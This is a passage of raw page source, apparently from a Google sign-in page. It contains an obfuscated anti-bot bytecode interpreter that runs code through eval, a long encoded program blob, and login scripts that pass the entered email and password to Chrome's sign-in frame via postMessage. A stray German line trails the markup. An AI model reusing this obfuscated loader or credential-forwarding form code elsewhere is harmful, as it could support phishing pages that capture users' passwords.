is,this.j,[]),this.G=true,v(this,this.ca,this),v(this,this.l,this.l),v(this,this
.m,2048),v(this,this.g,[]),v(this,this.B,{}),v(this,this.J,0),v(this,this.C,0),v
(this,this.$,[]),v(this,this.K,0),b=0;64>b;++b);if(a&&"!"==a.charAt(0))this.u=a;

else{if(window.atob){for(d=window.atob(a),a=[],e=b=0;e<d.length;e++){for(g=d.cha
rCodeAt(e);255<g;)a[b++]=g&255,g>>=8;a[b++]=g}c=a}else c=null;(this.f=c)&&this.f
.length?(this.T=[],this.H()):this.h(this.V)}}catch(l){y(this,l)}}),A=function(a,
b,c,d,e){for(b=[],d=c=0;d<a.length;d++)e=a.charCodeAt(d),128>e?b[c++]=e:(2048>e?
b[c++]=e>>6|192:(b[c++]=e>>12|224,b[c++]=e>>6&63|128),b[c++]=e&63|128);return b}
,D=function(a,b,c){if(b=a.a(a.b),!(b in a.f))throw a.h(a.W),a.A;return void 0==a
.F&&(a.F=B(a.f,b-4),a.D=void 0),a.D!=b>>3&&(a.D=b>>3,c=[0,0,0,a.a(a.C)],a.ja=C(a
.F,a.D,c)),v(a,a.b,b+1),a.f[b]^a.ja[b%8]},E=(t=z.prototype,t.K=194,t.v="caller",
t.b=145,t.I=92,t.aa=202,t.X=33,function(a,b,c,d,e,g){for(e=a.a(b),b=b==a.i?funct
ion(b,c,d,g){if(c=e.length,d=c-4>>3,e.ka!=d){e.ka=d,d=(d<<3)-4,g=[0,0,0,a.a(a.K)
];try{e.ia=C(B(e,d),B(e,d+4),g)}catch(r){throw r;}}e.push(e.ia[c&7]^b)}:function
(a){e.push(a)},d&&b(d&255),g=0,d=c.length;g<d;g++)b(c[g])}),G=(t.m=94,z.prototyp
e.pa=function(a,b,c,d){try{d=a[(b+2)%3],a[b]=a[b]-a[(b+1)%3]-d^(1==b?d<<c:d>>>c)
}catch(e){throw e;}},t.da=15,function(a,b,c,d){return c=a.a(a.b),a.f&&c<a.f.leng
th?(v(a,a.b,a.f.length),F(a,b)):v(a,a.b,b),d=a.H(),v(a,a.b,c),d}),B=(t.s=244,fun
ction(a,b){return a[b]<<24|a[b+1]<<16|a[b+2]<<8|a[b+3]}),v=(t.$=206,function(a,b
,c){if(b==a.b||b==a.s)a.c[b]?a.c[b].ma(c):a.c[b]=H(c);else if(b!=a.g&&b!=a.i&&b!
=a.j||!a.c[b])a.c[b]=I(c,a.a);b==a.C&&(a.F=void 0,v(a,a.b,a.a(a.b)+4))}),F=(t.l=
121,function(a,b){a.T.push(a.c.slice()),a.c[a.b]=void 0,v(a,a.b,b)}),K=(t.B=151,
t.V=17,z.prototype.a=function(a,b){if(b=this.c[a],void 0===b)throw this.h(this.Y
,0,a),this.A;return b()},z.prototype.h=function(a,b,c,d){d=this.a(this.s),a=[a,d
>>8&255,d&255],void 0!=c&&a.push(c),0==this.a(this.j).length&&(this.c[this.j]=vo
id 0,v(this,this.j,a)),c="",b&&(b.message&&(c+=b.message),b.stack&&(c+=":"+b.sta
ck)),b=this.a(this.m),3<b&&(c=c.slice(0,b-3),b-=c.length+3,c=A(c.replace(/\\r\\n
/g,"\\n")),E(this,this.i,J(c.length,2).concat(c),this.ea)),v(this,this.m,b)},t.Y
=30,t.A={},t.i=51,function(a,b,c,d){return function(){if(!d||a.G)return v(a,a.ba
,arguments),v(a,a.B,c),G(a,b)}}),H=(t.ga=42,function(a,b,c){return c=function(){
return a},b=function(){return c()},b.ma=function(b){a=b},b}),J=function(a,b,c,d)
{for(d=b-1,c=[];0<=d;d--)c[b-1-d]=a>>8*d&255;return c},y=(t.C=185,t.O=[function(
a){L(a,4)},function(a,b,c,d){b=D(a),c=D(a),d=D(a),v(a,d,a.a(b)>>c)},function(a,b
){b=M(a),v(a,b.S,b.P.apply(b.R,b.o))},function(){},function(a){L(a,2)},function(
a,b,c){b=D(a),c=D(a),v(a,c,a.a(c)%a.a(b))},function(a,b,c,d){b=D(a),c=D(a),d=D(a
),a.a(b)>a.a(c)&&v(a,d,a.a(d)+1)},function(a){N(a,1)},function(a){N(a,2)},functi
on(a,b,c,d){b=D(a),c=D(a),d=D(a),a.a(b)[a.a(c)]=a.a(d)},function(a,b,c,d){if(b=a
.T.pop()){for(c=D(a);0<c;c--)d=D(a),b[d]=a.c[d];a.c=b}else v(a,a.b,a.f.length)},
function(a){O(a,7)},function(){},function(a,b,c,d,e,g,l){b=M(a),e=b.P,d=b.R,c=b.
o,l=c.length,0==l?g=new d[e]:1==l?g=new d[e](c[0]):2==l?g=new d[e](c[0],c[1]):3=
=l?g=new d[e](c[0],c[1],c[2]):4==l?g=new d[e](c[0],c[1],c[2],c[3]):a.h(a.w),v(a,
b.S,g)},function(){},function(a,b){b=a.a(D(a)),F(a,b)},function(a,b,c){b=D(a),c=
D(a),v(a,c,""+a.a(b))},function(a,b,c){b=D(a),c=D(a),v(a,c,a.a(c)-a.a(b))},funct
ion(a,b,c,d,e){for(b=D(a),c=D(a)<<8|D(a),d=Array(c),e=0;e<c;e++)d[e]=D(a);v(a,b,
d)},function(a,b,c){b=D(a),c=D(a),b=a.a(b),v(a,c,b)},function(a,b,c,d){b=D(a),c=
D(a),d=D(a),v(a,d,a.a(b)<<c)},function(a){O(a,0)},function(a,b,c){b=D(a),c=D(a),
v(a,c,function(a){return eval(a)}(a.a(b)))},function(a,b,c){b=D(a),c=D(a),0!=a.a
(b)&&v(a,a.b,a.a(c))},function(a,b,c,d){b=D(a),c=D(a),d=D(a),c=a.a(c),b=a.a(b),v
(a,d,b[c])},function(a,b,c,d,e,g,l,m,n){if(b=D(a),c=D(a)<<8|D(a),d="",void 0!=a.
c[a.I])for(e=a.a(a.I);c--;)g=e[D(a)<<8|D(a)],d+=g;else{for(d=Array(c),e=0;e<c;e+
+)d[e]=D(a);for(c=[],g=e=0;e<d.length;)l=d[e++],128>l?c[g++]=String.fromCharCode
(l):191<l&&224>l?(m=d[e++],c[g++]=String.fromCharCode((l&31)<<6|m&63)):(m=d[e++]
,n=d[e++],c[g++]=String.fromCharCode((l&15)<<12|(m&63)<<6|n&63));d=c.join("")}v(
a,b,d)},function(a,b,c){b=D(a),c=D(a),v(a,c,a.a(c)*a.a(b))},function(a,b,c,d){b=
D(a),c=D(a),d=D(a),v(a,d,a.a(b)||a.a(c))},function(a,b,c,d){b=D(a),c=D(a),d=D(a)
,v(a,d,(a.a(b)in a.a(c))+0)},function(a,b,c){b=D(a),c=D(a),b=a.a(b),v(a,c,k(b))}
,function(a,b,c,d){b=D(a),c=D(a),d=D(a),a.a(b)==a.a(c)&&v(a,d,a.a(d)+1)},functio
n(a,b,c){b=D(a),c=D(a),v(a,c,a.a(c)+a.a(b))},function(a){O(a,4)},function(a){N(a
,4)},function(a){L(a,1)},function(a,b,c,d,e){b=D(a),c=D(a),d=D(a),b=a.a(b),e=a.a
(D(a)),c=a.a(c),d=a.a(d),0!==b&&b.addEventListener(c,K(a,d,e,true),false)},funct
ion(a){O(a,3)},function(a,b,c,d){b=D(a),c=D(a),d=D(a),v(a,d,a.a(b)|a.a(c))},func
tion(a,b,c,d,e,g){if(b=D(a),c=D(a),d=D(a),e=D(a),b=a.a(b),c=a.a(c),d=a.a(d),a=a.
a(e),"object"==k(b)){for(g in e=[],b)e.push(g);b=e}for(e=0,g=b.length;e<g;e+=d)c

(b.slice(e,e+d),a)},function(a,b,c,d){b=D(a),c=D(a),d=a.a(D(a)),c=a.a(c),v(a,b,K
(a,c,d))}],z.prototype.qa=function(a,b){b.push(a[0]<<24|a[1]<<16|a[2]<<8|a[3]),b
.push(a[4]<<24|a[5]<<16|a[6]<<8|a[7]),b.push(a[8]<<24|a[9]<<16|a[10]<<8|a[11])},
t.ca=228,t.ba=71,t.M="toString",t.fa=10,function(a,b){a.u=("E:"+b.message+":"+b.
stack).slice(0,2048)}),M=function(a,b,c,d,e,g){for(b={},c=D(a),b.S=D(a),b.o=[],d
=D(a)-1,e=D(a),g=0;g<d;g++)b.o.push(D(a));for(b.P=a.a(c),b.R=a.a(e);d--;)b.o[d]=
a.a(b.o[d]);return b},x=(t.j=128,t.ea=12,t.J=248,t.ha=34,t.W=31,t.L=232,function
(a,b){for(b=Array(a);a--;)b[a]=255*Math.random()|0;return b}),I=(t.Z=36,function
(a,b,c,d,e,g,l,m,n){return d=function(){return c()},e=z.prototype,g=e.H,l=e.N,m=
z,n=e.h,c=function(a,r,w){for(a=d[e.v],w=0,r=a===b,a=a&&a[e.v];a&&a!=g&&a!=l&&a!
=m&&a!=n&&20>w;)w++,a=a[e.v];return c[e.ha+r+!(!a+(w+3>>3))]},d[e.M]=e,c[e.Z]=a,
a=void 0,d}),C=(z.prototype.oa=function(a,b,c,d){if(3==a.length){for(c=0;3>c;c++
)b[c]+=a[c];for(c=0,d=[13,8,13,12,16,5,3,10,15];9>c;c++)b[3](b,c%3,d[c])}},funct
ion(a,b,c,d){try{for(d=0;84941944608!=d;)a+=(b<<4^b>>>5)+b^d+c[d&3],d+=265443576
9,b+=(a<<4^a>>>5)+a^d+c[d>>>11&3];return[a>>>24,a>>16&255,a>>8&255,a&255,b>>>24,
b>>16&255,b>>8&255,b&255]}catch(e){throw e;}}),P=(t.w=22,t.U=21,t.g=37,function(
a,b,c,d){if(8192>=a.length)return String.fromCharCode.apply(null,a);for(c=0,b=""
;c<a.length;c+=8192)d=q(a,c,c+8192),b+=String.fromCharCode.apply(null,d);return
b}),N=(z.prototype.na=function(a){return(a=window.performance)&&a.now?function()
{return a.now()|0}:function(){return+new Date}}(),function(a,b,c,d){c=D(a),d=D(a
),E(a,d,J(a.a(c),b))}),L=(z.prototype.N=function(a,b,c,d,e,g,l,m,n,u){if(this.u)
return this.u;try{if(this.G=false,b=this.a(this.g).length,c=this.a(this.i).lengt
h,d=this.a(this.m),this.c[this.L]&&G(this,this.a(this.L)),e=this.a(this.j),0<e.l
ength&&E(this,this.g,J(e.length,2).concat(e),this.da),g=this.a(this.J)&255,g-=th
is.a(this.g).length+5,l=this.a(this.i),4<l.length&&(g-=l.length+3),0<g&&E(this,t
his.g,J(g,2).concat(x(g)),this.fa),4<l.length&&E(this,this.g,J(l.length,2).conca
t(l),this.ga),m=x(2).concat(this.a(this.g)),m[1]=m[0]^3,n=window.btoa?window.bto
a(P(m)).replace(/\\+/g,"-").replace(/\\//g,"_").replace(/=/g,""):void 0,n)n="!"+
n;else for(e=0,n="";e<m.length;e++)u=m[e][this.M](16),1==u.length&&(u="0"+u),n+=
u;this.a(this.g).length=b,this.a(this.i).length=c,v(this,this.m,d),a=n,this.G=tr
ue}catch(r){y(this,r),a=this.u}return a},z.prototype.la=function(a,b){return b=t
his.N(),a&&a(b),b},function(a,b,c,d){for(c=D(a),d=0;0<b;b--)d=d<<8|D(a);v(a,c,d)
}),O=function(a,b,c,d,e,g){d=b&3,c=b&4,e=D(a),g=D(a),e=a.a(e),c&&(e=A((""+e).rep
lace(/\\r\\n/g,"\\n"))),d&&E(a,g,J(e.length,2)),E(a,g,e)};z.prototype.H=function
(a,b,c,d,e,g){try{for(d=0,b=5001,c=void 0,a=this.f.length;--b&&(d=this.a(this.b)
)<a;)try{v(this,this.s,d),e=D(this)%this.O.length,(c=this.O[e])?c(this):this.h(t
his.U,0,e)}catch(l){l!=this.A&&(g=this.a(this.l),g!=this.l?(v(this,g,l),v(this,t
his.l,this.l)):this.h(this.w,l))}b||this.h(this.X)}catch(m){try{this.h(this.w,m)
}catch(n){y(this,n)}}return this.a(this.B)};try{window.addEventListener("unload"
,function(){},false)}catch(Q){}h("botguard.bg",z),h("botguard.bg.prototype.invok
e",z.prototype.la);')})()</script>
<script type="text/javascript">
document.bg = new botguard.bg('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
T7g6UJY0L4FHvY4M0gjRNVHCmMXeLIlff');
</script>
<script>
(function() {
function gaia_setFocus() {
var form = null;
if (document.getElementById) {
form = document.getElementById('gaia_loginform');
}
if (form && form.Passwd) {
form.Passwd.focus();
}
}
if (!/iPad|iPhone|iPod/.test(navigator.userAgent)) {
gaia_attachEvent(window, 'load', gaia_setFocus);
}
})();
</script>
<script>
var gaia_scrollToElement = function(element) {
var calculateOffsetHeight = function(element) {
var curtop = 0;
if (element.offsetParent) {
while (element) {
curtop += element.offsetTop;
element = element.offsetParent;
}
}
return curtop;
}
var siginOffsetHeight = calculateOffsetHeight(element);
var scrollHeight = siginOffsetHeight - window.innerHeight +
element.clientHeight + 0.02 * window.innerHeight;
window.scroll(0, scrollHeight);
}
</script>
<script>
(function() {

var $ = function(id) { return document.getElementById(id); };


var gaiaLoginForm = $('gaia_loginform');
var chromeExt = 'chrome-extension://mfffpogegjflfpflabcdkioaeobkgjik';
var chromeSigninUrl = 'chrome://chrome-signin';
var chromeOsUrl = 'chrome://oobe';
var chromeWebview = undefined;
onMessage = function(e) {
if (e.origin == chromeSigninUrl || e.origin == chromeOsUrl) {
chromeWebview = e.source;
}
};
window.addEventListener('message', onMessage);
gaia_onChromeLoginSubmit = function(e) {
if (!chromeWebview && window == window.parent) {
return;
}
if (gaiaLoginForm['Email'] && gaiaLoginForm['Passwd']) {
var checkboxElement = $('advanced-box');
var chooseWhatToSync = checkboxElement && checkboxElement.checked;
var attemptToken = new Date().getTime();
var msg = {method: 'attemptLogin',
email: gaiaLoginForm['Email'].value,
password: gaiaLoginForm['Passwd'].value,
attemptToken: attemptToken,
chooseWhatToSync: chooseWhatToSync};
if (chromeWebview) {
chromeWebview.postMessage(msg, chromeSigninUrl);
} else {
window.parent.postMessage(msg, chromeExt);
}
console.log('Credentials sent');
var continueUrlElement = gaiaLoginForm['continue'];
if (continueUrlElement) {
var prevAttemptIndex = continueUrlElement.value.indexOf('?attemptToken');
if (prevAttemptIndex != -1) {
continueUrlElement.value = continueUrlElement.value.substr(
0, prevAttemptIndex);
}
continueUrlElement.value += '?attemptToken=' + attemptToken;
}
}
};
gaia_attachEvent(gaiaLoginForm, 'submit', gaia_onChromeLoginSubmit);
})();
</script>
<script>
function gaia_onLoginSubmit() {
try {
gaia.loginAutoRedirect.stop();
} catch (err) {
// do not prevent form from being submitted
}
try {
document.bg.invoke(function(response) {
document.getElementById('bgresponse').value = response;
});
} catch (err) {
document.getElementById('bgresponse').value = '';
}
return true;

}
document.getElementById('gaia_loginform').onsubmit = gaia_onLoginSubmit;
var signinButton = document.getElementById('signIn');
gaia_attachEvent(window, 'load', function(){
gaia_scrollToElement(signinButton);
});
</script>
</body>
</html>

Das könnte Ihnen auch gefallen